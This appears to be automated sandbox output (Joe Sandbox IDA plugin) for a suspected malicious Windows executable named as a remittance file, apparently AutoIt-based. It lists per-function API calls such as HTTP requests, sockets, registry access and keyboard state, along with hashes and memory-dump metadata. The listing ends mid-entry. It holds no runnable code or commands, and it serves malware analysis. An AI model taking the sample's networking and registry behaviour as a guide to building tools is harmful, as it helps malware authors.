• Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
• Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
• Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
APIs
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
• Sleep.KERNEL32(0000000A), ref: 0042C67F
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
Strings
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID: @COM_EVENTOBJ
• API String ID: 327565842-2228938565
• Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
• Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
• Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
• Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
APIs
• VariantClear.OLEAUT32(?), ref: 0047031B
• VariantClear.OLEAUT32(?), ref: 0047044F
• VariantInit.OLEAUT32(?), ref: 004704A3
• DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
• VariantClear.OLEAUT32(?), ref: 00470516
  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
• VariantCopy.OLEAUT32(?,?), ref: 0047057A
  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
• VariantClear.OLEAUT32(00000000), ref: 0047060D
Strings
Similarity
• API ID: Variant$Clear$Copy$CallDispFuncInit
• String ID: H
• API String ID: 3613100350-2852464175
• Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
• Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
• Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
• Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
APIs
• mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
• DestroyWindow.USER32(?), ref: 00426F50
• UnregisterHotKey.USER32(?), ref: 00426F77
• FreeLibrary.KERNEL32(?), ref: 0042701F
• VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
Strings
Similarity
• API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
• String ID: close all
• API String ID: 4174999648-3243417748
• Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
• Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
• Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
• Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Similarity
• API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
• String ID:
• API String ID: 1291720006-3916222277
• Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
• Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
• IsMenu.USER32(?), ref: 0045FC5F
• CreatePopupMenu.USER32 ref: 0045FC97
• GetMenuItemCount.USER32(?), ref: 0045FCFD
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
Strings
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
• Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
APIs
• SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
• VariantClear.OLEAUT32(?), ref: 00435320
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
• VariantClear.OLEAUT32(?), ref: 004353B3
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
Strings
Similarity
• API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
• String ID: crts
• API String ID: 586820018-3724388283
• Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
• Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,0040F545,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,004A90E8,C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe,?,0040F545), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• _wcscat.LIBCMT ref: 0044BCAF
• _wcslen.LIBCMT ref: 0044BCBB
• _wcslen.LIBCMT ref: 0044BCD1
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Strings
                                                                      Similarity
                                                                      • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                      • String ID: \*.*
                                                                      • API String ID: 2326526234-1173974218
                                                                      APIs
                                                                        • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                      • _wcslen.LIBCMT ref: 004335F2
                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                      • GetLastError.KERNEL32 ref: 0043362B
                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                      • _wcsrchr.LIBCMT ref: 00433666
                                                                        • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                      • String ID: \
                                                                      • API String ID: 321622961-2967466578
                                                                      APIs
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                      • API String ID: 1038674560-2734436370
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                      • __lock.LIBCMT ref: 00417981
                                                                        • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                        • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                        • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                      • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                      • __lock.LIBCMT ref: 004179A2
                                                                      • ___addlocaleref.LIBCMT ref: 004179C0
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                      • String ID: KERNEL32.DLL$pI
                                                                      • API String ID: 637971194-197072765
                                                                      APIs
                                                                      Similarity
                                                                      • API ID: _memmove$_malloc
                                                                      • String ID:
                                                                      • API String ID: 1938898002-0
                                                                      APIs
                                                                        • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                                      • SendMessageW.USER32(75A923D0,00001001,00000000,?), ref: 00448E16
                                                                      • SendMessageW.USER32(75A923D0,00001026,00000000,?), ref: 00448E25
                                                                        • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                                      Similarity
                                                                      • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                      • String ID:
                                                                      • API String ID: 3771399671-0
                                                                      APIs
                                                                      • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                      • _memmove.LIBCMT ref: 0044B555
                                                                      • _memmove.LIBCMT ref: 0044B578
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                      • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                      Similarity
                                                                      • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                      • String ID:
                                                                      • API String ID: 2737351978-0
                                                                      APIs
                                                                      • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                      • __calloc_crt.LIBCMT ref: 00415246
                                                                      • __getptd.LIBCMT ref: 00415253
                                                                      • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                      • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                      • _free.LIBCMT ref: 0041529E
                                                                      • __dosmaperr.LIBCMT ref: 004152A9
                                                                        • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                      Similarity
                                                                      • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                      • String ID:
                                                                      • API String ID: 3638380555-0
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 0046C96E
                                                                        • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                                                        • Part of subcall function 00451B42: VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                                                        • Part of subcall function 00451B42: VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                                                      Strings
                                                                      Similarity
                                                                      • API ID: Variant$Copy$ClearErrorInitLast
                                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                      • API String ID: 3207048006-625585964
                                                                      APIs
                                                                      • WSAStartup.WSOCK32(00000101,?), ref: 00465559
                                                                        • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                      • inet_addr.WSOCK32(?,00000000,?,?), ref: 0046559B
                                                                      • gethostbyname.WSOCK32(?), ref: 004655A6
                                                                      • GlobalAlloc.KERNEL32(00000040,00000040), ref: 0046561C
                                                                      • _memmove.LIBCMT ref: 004656CA
                                                                      • GlobalFree.KERNEL32(00000000), ref: 0046575C
                                                                      • WSACleanup.WSOCK32 ref: 00465762
                                                                      Similarity
                                                                      • API ID: Global$AllocByteCharCleanupFreeMultiStartupWide_memmovegethostbynameinet_addr
                                                                      • String ID:
                                                                      • API String ID: 2945290962-0
                                                                      • Opcode ID: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                      • Instruction ID: 472bd1bc5547e678c188051989a3a6c7a671c7751f2ff3ad056c489052ad9926
                                                                      • Opcode Fuzzy Hash: b73dd2c417b7ad13d51beda6076b83dea337e616a356c7a57e90c36d1df505c0
                                                                      • Instruction Fuzzy Hash: CAA19E72604300AFD310EF65C981F5FB7E8AF88704F544A1EF64597291E778E905CB9A
                                                                      APIs
                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00440527
                                                                      • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                                                      • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                                                      • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                                                      • String ID:
                                                                      • API String ID: 1457242333-0
                                                                      • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                      • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                                                      • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                                                      • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                                                      APIs
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B799
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ConnectRegistry_memmove_wcslen
                                                                      • String ID:
                                                                      • API String ID: 15295421-0
                                                                      • Opcode ID: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                      • Instruction ID: 8aea567fc0405534ed4901798b67d501f7e0ea7b8d3e81485b6dc33093e60a2a
                                                                      • Opcode Fuzzy Hash: af9aed33993baa0a6bbf415c0be9acaad95f35a4fb003459e4997ac6d107bcf3
                                                                      • Instruction Fuzzy Hash: 96A170B12043019FD710EF65CC85B1BB7E8EF85304F14892EF6859B291DB78E945CB9A
                                                                      APIs
                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                      • _wcstok.LIBCMT ref: 004675B2
                                                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                      • _wcscpy.LIBCMT ref: 00467641
                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                      • _wcslen.LIBCMT ref: 00467793
                                                                      • _wcslen.LIBCMT ref: 004677BD
                                                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$FileName_memmove$OpenSave__getptd_wcscpy_wcstok
                                                                      • String ID: X
                                                                      • API String ID: 780548581-3081909835
                                                                      • Opcode ID: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                      • Instruction ID: 4d78316a312392ccd7929e5b9cc6f9f998d70627324fd0ae594e8e4bf7546d1d
                                                                      • Opcode Fuzzy Hash: 59d8333ba564867e966a45eb1cae5b5c9aa55f5f2a82546ce07c615cef46a44c
                                                                      • Instruction Fuzzy Hash: 1381A3315083008FD310EF65C985A5FB7E5AF84318F108A2FF599572A1EB78ED46CB9A
                                                                      APIs
                                                                        • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                        • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                        • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                        • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                      • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                                                      • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                                                      • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                                                      • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                                                      • CloseFigure.GDI32(?), ref: 0044751F
                                                                      • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                                                      • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
                                                                      • String ID:
                                                                      • API String ID: 4082120231-0
                                                                      • Opcode ID: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                      • Instruction ID: e674395c2b36b0b5590bf657e4107f8d2570055e184bc57fe517c57e0a53fcaf
                                                                      • Opcode Fuzzy Hash: 7999c5ddb42d2811e8fcb41125d4db3c21d66abb345ae56e6caae54fa290efb2
                                                                      • Instruction Fuzzy Hash: 36713CB4904109EFEB04CF94C884EBEBBB9EF85310F24855AE9156B341D774AE42CBA5
                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B3A6
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                      • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                      • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                      • String ID:
                                                                      • API String ID: 2027346449-0
                                                                      • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                      • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                      • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                      • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                      APIs
                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                      • GetMenu.USER32 ref: 0047A703
                                                                      • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                      • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                      • _wcslen.LIBCMT ref: 0047A79E
                                                                      • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                      • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                      • String ID:
                                                                      • API String ID: 3257027151-0
                                                                      • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                      • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                                                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                      APIs
                                                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2134980433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2134962627.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135078989.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135096349.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135110807.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135128584.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.2135170221.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_z84TTREMITTANCEUSD347_432_63.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastselect
                                                                      • String ID:
                                                                      • API String ID: 215497628-0
                                                                      • Opcode ID: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                                                      • Opcode Fuzzy Hash: bd199fa730e01bd6eb844f10b5a9d2666f16aab98b040269f67dcb89f4e9aede
                                                                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                                                      APIs
                                                                      • GetParent.USER32(?), ref: 0044443B
                                                                      • GetKeyboardState.USER32(?), ref: 00444450
                                                                      • SetKeyboardState.USER32(?), ref: 004444A4
